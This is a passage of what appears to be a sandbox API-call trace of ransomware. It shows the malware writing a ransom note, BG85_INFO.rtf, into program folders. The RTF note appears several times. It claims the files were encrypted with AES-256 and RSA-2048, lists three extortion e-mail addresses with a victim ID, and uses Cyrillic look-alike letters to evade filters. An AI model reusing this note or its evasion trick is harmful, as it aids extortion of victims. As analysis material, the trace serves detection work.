h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.473] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.473] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.475] CloseHandle (hObject=0x1dc) returned 1 [0065.475] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\bg85_info.rtf")) returned 0xffffffff [0065.476] GetLastError () returned 0x2 [0065.476] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CZE\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cze\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.476] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 